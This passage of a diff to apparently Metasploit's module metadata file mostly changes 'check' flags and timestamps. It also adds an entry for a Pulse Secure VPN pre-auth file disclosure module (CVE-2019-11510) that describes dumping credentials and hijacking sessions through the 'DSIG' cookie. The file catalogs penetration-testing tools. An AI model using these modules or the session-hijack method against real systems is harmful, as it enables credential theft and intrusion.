-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -15906,7 +16224,7 @@
     "path": "/modules/auxiliary/gather/hp_enum_perfd.rb",
     "is_install_path": true,
     "ref_name": "gather/hp_enum_perfd",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -16408,7 +16726,7 @@
     "path": "/modules/auxiliary/gather/ipcamera_password_disclosure.rb",
     "is_install_path": true,
     "ref_name": "gather/ipcamera_password_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -16669,7 +16987,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-11-05 18:32:45 +0000",
     "path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
     "is_install_path": true,
     "ref_name": "gather/kerberos_enumusers",
@@ -16716,11 +17034,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2018-08-21 08:50:26 +0000",
+    "mod_time": "2019-11-05 18:32:45 +0000",
     "path": "/modules/auxiliary/gather/konica_minolta_pwd_extract.rb",
     "is_install_path": true,
     "ref_name": "gather/konica_minolta_pwd_extract",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -16764,7 +17082,7 @@
       "sybase"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 18:32:45 +0000",
     "path": "/modules/auxiliary/gather/lansweeper_collector.rb",
     "is_install_path": true,
     "ref_name": "gather/lansweeper_collector",
@@ -16901,7 +17219,7 @@
     "path": "/modules/auxiliary/gather/memcached_extractor.rb",
     "is_install_path": true,
     "ref_name": "gather/memcached_extractor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -17071,7 +17389,7 @@
     "path": "/modules/auxiliary/gather/natpmp_external_address.rb",
     "is_install_path": true,
     "ref_name": "gather/natpmp_external_address",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -17437,6 +17755,68 @@
     },
     "needs_cleanup": false
   },
+  "auxiliary_gather/pulse_secure_file_disclosure": {
+    "name": "Pulse Secure VPN Arbitrary File Disclosure",
+    "fullname": "auxiliary/gather/pulse_secure_file_disclosure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-04-24",
+    "type": "auxiliary",
+    "author": [
+      "Orange Tsai",
+      "Meh Chang",
+      "Alyssa Herrera",
+      "Justin Wagner",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a pre-auth directory traversal in the Pulse Secure\n        VPN server to dump an arbitrary file. Dumped files are stored in loot.\n\n        If the \"Automatic\" action is set, plaintext and hashed credentials, as\n        well as session IDs, will be dumped. Valid sessions can be hijacked by\n        setting the \"DSIG\" browser cookie to a valid session ID.\n\n        For the \"Manual\" action, please specify a file to dump via the \"FILE\"\n        option. /etc/passwd will be dumped by default. If the \"PRINT\" option is\n        set, file contents will be printed to the screen, with any unprintable\n        characters replaced by a period.\n\n        Please see related module exploit/linux/http/pulse_secure_cmd_exec for\n        a post-auth exploit that can leverage the results from this module.",
+    "references": [
+      "CVE-2019-11510",
+      "URL-https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/",
+      "URL-https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html",
+      "URL-https://hackerone.com/reports/591295"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2019-10-31 13:07:41 +0000",
+    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "gather/pulse_secure_file_disclosure",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "RelatedModules": [
+        "exploit/linux/http/pulse_secure_cmd_exec"
+      ]
+    },
+    "needs_cleanup": false
+  },
   "auxiliary_gather/qnap_backtrace_admin_hash": {
     "name": "QNAP NAS/NVR Administrator Hash Disclosure",
     "fullname": "auxiliary/gather/qnap_backtrace_admin_hash",
@@ -18070,7 +18450,7 @@
     "path": "/modules/auxiliary/gather/windows_deployment_services_shares.rb",
     "is_install_path": true,
     "ref_name": "gather/windows_deployment_services_shares",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18214,7 +18594,7 @@
     "path": "/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb",
     "is_install_path": true,
     "ref_name": "gather/wp_w3_total_cache_hash_extract",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18298,7 +18678,7 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 18:32:45 +0000",
     "path": "/modules/auxiliary/gather/xerox_pwd_extract.rb",
     "is_install_path": true,
     "ref_name": "gather/xerox_pwd_extract",
@@ -18345,7 +18725,7 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 18:32:45 +0000",
     "path": "/modules/auxiliary/gather/xerox_workcentre_5xxx_ldap.rb",
     "is_install_path": true,
     "ref_name": "gather/xerox_workcentre_5xxx_ldap",
@@ -18595,7 +18975,7 @@
     "path": "/modules/auxiliary/scanner/acpp/login.rb",
     "is_install_path": true,
     "ref_name": "scanner/acpp/login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -18633,7 +19013,7 @@
     "path": "/modules/auxiliary/scanner/afp/afp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/afp/afp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -18670,7 +19050,7 @@
     "path": "/modules/auxiliary/scanner/afp/afp_server_info.rb",
     "is_install_path": true,
     "ref_name": "scanner/afp/afp_server_info",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18709,7 +19089,7 @@
     "path": "/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb",
     "is_install_path": true,
     "ref_name": "scanner/backdoor/energizer_duo_detect",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18747,7 +19127,7 @@
     "path": "/modules/auxiliary/scanner/chargen/chargen_probe.rb",
     "is_install_path": true,
     "ref_name": "scanner/chargen/chargen_probe",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18844,7 +19224,7 @@
     "path": "/modules/auxiliary/scanner/couchdb/couchdb_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/couchdb/couchdb_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -18877,11 +19257,11 @@
 
     ],
     "targets": null,
-    "mod_time": "2019-06-27 17:06:32 +0000",
+    "mod_time": "2019-10-03 12:45:09 +0000",
     "path": "/modules/auxiliary/scanner/db2/db2_auth.rb",
     "is_install_path": true,
     "ref_name": "scanner/db2/db2_auth",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -18918,7 +19298,7 @@
     "path": "/modules/auxiliary/scanner/db2/db2_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/db2/db2_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18955,7 +19335,7 @@
     "path": "/modules/auxiliary/scanner/db2/discovery.rb",
     "is_install_path": true,
     "ref_name": "scanner/db2/discovery",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -18992,7 +19372,7 @@
     "path": "/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/endpoint_mapper",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19029,7 +19409,7 @@
     "path": "/modules/auxiliary/scanner/dcerpc/hidden.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/hidden",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19066,7 +19446,7 @@
     "path": "/modules/auxiliary/scanner/dcerpc/management.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/management",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19103,7 +19483,7 @@
     "path": "/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/tcp_dcerpc_auditor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19141,7 +19521,7 @@
     "path": "/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb",
     "is_install_path": true,
     "ref_name": "scanner/dcerpc/windows_deployment_services",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19252,7 +19632,7 @@
     "path": "/modules/auxiliary/scanner/discovery/arp_sweep.rb",
     "is_install_path": true,
     "ref_name": "scanner/discovery/arp_sweep",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19289,7 +19669,7 @@
     "path": "/modules/auxiliary/scanner/discovery/empty_udp.rb",
     "is_install_path": true,
     "ref_name": "scanner/discovery/empty_udp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19363,7 +19743,7 @@
     "path": "/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb",
     "is_install_path": true,
     "ref_name": "scanner/discovery/ipv6_neighbor",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19434,11 +19814,11 @@
 
     ],
     "targets": null,
-    "mod_time": "2018-05-31 14:32:31 +0000",
+    "mod_time": "2019-10-04 21:56:52 +0000",
     "path": "/modules/auxiliary/scanner/discovery/udp_probe.rb",
     "is_install_path": true,
     "ref_name": "scanner/discovery/udp_probe",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19471,11 +19851,11 @@
 
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-03 12:38:36 +0000",
     "path": "/modules/auxiliary/scanner/discovery/udp_sweep.rb",
     "is_install_path": true,
     "ref_name": "scanner/discovery/udp_sweep",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19553,7 +19933,7 @@
     "path": "/modules/auxiliary/scanner/dns/dns_amp.rb",
     "is_install_path": true,
     "ref_name": "scanner/dns/dns_amp",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19599,7 +19979,7 @@
     "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19636,7 +20016,7 @@
     "path": "/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb",
     "is_install_path": true,
     "ref_name": "scanner/emc/alphastor_devicemanager",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19673,7 +20053,7 @@
     "path": "/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb",
     "is_install_path": true,
     "ref_name": "scanner/emc/alphastor_librarymanager",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19721,7 +20101,7 @@
     "path": "/modules/auxiliary/scanner/etcd/open_key_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/etcd/open_key_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19769,7 +20149,7 @@
     "path": "/modules/auxiliary/scanner/etcd/version.rb",
     "is_install_path": true,
     "ref_name": "scanner/etcd/version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19806,7 +20186,7 @@
     "path": "/modules/auxiliary/scanner/finger/finger_users.rb",
     "is_install_path": true,
     "ref_name": "scanner/finger/finger_users",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19844,7 +20224,7 @@
     "path": "/modules/auxiliary/scanner/ftp/anonymous.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/anonymous",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -19881,7 +20261,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-03 12:47:49 +0000",
     "path": "/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/bison_ftp_traversal",
@@ -19922,7 +20302,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2017-12-11 14:40:09 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/colorado_ftp_traversal",
@@ -19960,7 +20340,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/scanner/ftp/easy_file_sharing_ftp.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/easy_file_sharing_ftp",
@@ -20002,7 +20382,7 @@
     "path": "/modules/auxiliary/scanner/ftp/ftp_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/ftp_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -20040,7 +20420,7 @@
     "path": "/modules/auxiliary/scanner/ftp/ftp_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/ftp_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20079,7 +20459,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/konica_ftp_traversal",
@@ -20120,7 +20500,7 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/pcman_ftp_traversal",
@@ -20161,11 +20541,11 @@
       "ftp"
     ],
     "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2019-10-05 13:50:30 +0000",
     "path": "/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/ftp/titanftp_xcrc_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20202,7 +20582,7 @@
     "path": "/modules/auxiliary/scanner/gopher/gopher_gophermap.rb",
     "is_install_path": true,
     "ref_name": "scanner/gopher/gopher_gophermap",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20241,7 +20621,7 @@
     "path": "/modules/auxiliary/scanner/gprs/gtp_echo.rb",
     "is_install_path": true,
     "ref_name": "scanner/gprs/gtp_echo",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20278,7 +20658,7 @@
     "path": "/modules/auxiliary/scanner/h323/h323_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/h323/h323_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20326,7 +20706,7 @@
     "path": "/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/a10networks_ax_directory_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20373,7 +20753,7 @@
     "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/accellion_fta_statecode_file_read",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20423,7 +20803,7 @@
     "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/adobe_xml_inject",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20469,7 +20849,7 @@
     "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/advantech_webaccess_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -20569,7 +20949,7 @@
     "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/apache_activemq_source_disclosure",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20618,7 +20998,7 @@
     "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/apache_activemq_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20724,7 +21104,7 @@
     "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/apache_optionsbleed",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20775,7 +21155,7 @@
     "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/apache_userdir_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -20822,7 +21202,7 @@
     "path": "/modules/auxiliary/scanner/http/appletv_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/appletv_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -20876,7 +21256,7 @@
     "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/atlassian_crowd_fileaccess",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20923,7 +21303,7 @@
     "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/axis_local_file_include",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -20970,7 +21350,7 @@
     "path": "/modules/auxiliary/scanner/http/axis_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/axis_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21016,7 +21396,7 @@
     "path": "/modules/auxiliary/scanner/http/backup_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/backup_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21064,7 +21444,7 @@
     "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/barracuda_directory_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21110,7 +21490,7 @@
     "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/bavision_cam_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21156,7 +21536,7 @@
     "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/binom3_login_config_pass_dump",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21207,7 +21587,7 @@
     "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/bitweaver_overlay_type_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21253,7 +21633,7 @@
     "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/blind_sql_query",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21343,11 +21723,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-21 16:45:42 +0000",
     "path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/brute_dirs",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21393,7 +21773,7 @@
     "path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/buffalo_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21439,7 +21819,7 @@
     "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/buildmaster_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21489,7 +21869,7 @@
     "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/caidao_bruteforce_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21537,7 +21917,7 @@
     "path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/canon_wireless",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21574,7 +21954,7 @@
     "path": "/modules/auxiliary/scanner/http/cert.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cert",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21623,7 +22003,7 @@
     "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cgit_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21669,7 +22049,7 @@
     "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/chef_webui_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -21715,7 +22095,7 @@
     "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/chromecast_webserver",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21761,7 +22141,7 @@
     "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/chromecast_wifi",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -21807,7 +22187,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_asa_asdm",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -21855,7 +22235,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_device_manager",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -21952,7 +22332,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_firepower_download",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -21998,7 +22378,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_firepower_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22047,7 +22427,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_ios_auth_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22093,7 +22473,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_ironport_enum",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -22140,7 +22520,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_nac_manager_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22186,7 +22566,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_ssl_vpn",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22235,7 +22615,7 @@
     "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cisco_ssl_vpn_priv_esc",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": true,
     "notes": {
@@ -22283,7 +22663,7 @@
     "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/clansphere_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22330,7 +22710,7 @@
     "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/cnpilot_r_web_login_loot",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22381,7 +22761,7 @@
     "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/coldfusion_locale_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22428,7 +22808,7 @@
     "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/coldfusion_version",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22476,7 +22856,7 @@
     "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/concrete5_member_list",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22522,7 +22902,7 @@
     "path": "/modules/auxiliary/scanner/http/copy_of_file.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/copy_of_file",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22615,7 +22995,7 @@
     "path": "/modules/auxiliary/scanner/http/dell_idrac.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dell_idrac",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22662,7 +23042,7 @@
     "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dicoogle_traversal",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22704,11 +23084,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
     "path": "/modules/auxiliary/scanner/http/dir_listing.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dir_listing",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22750,11 +23130,11 @@
       "https"
     ],
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
     "path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dir_scanner",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22804,7 +23184,7 @@
     "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/dir_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
     "post_auth": false,
     "default_credential": false,
     "notes": {
@@ -22850,7 +23230,7 @@
     "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
     "is_install_path": true,
     "ref_name": "scanner/http/directadmin_login",
-    "check": true,
+    "check": false,
     "post_auth": true,
     "default_credential": false,
     "notes": {
@@ -22897,7 +23277,7 @@
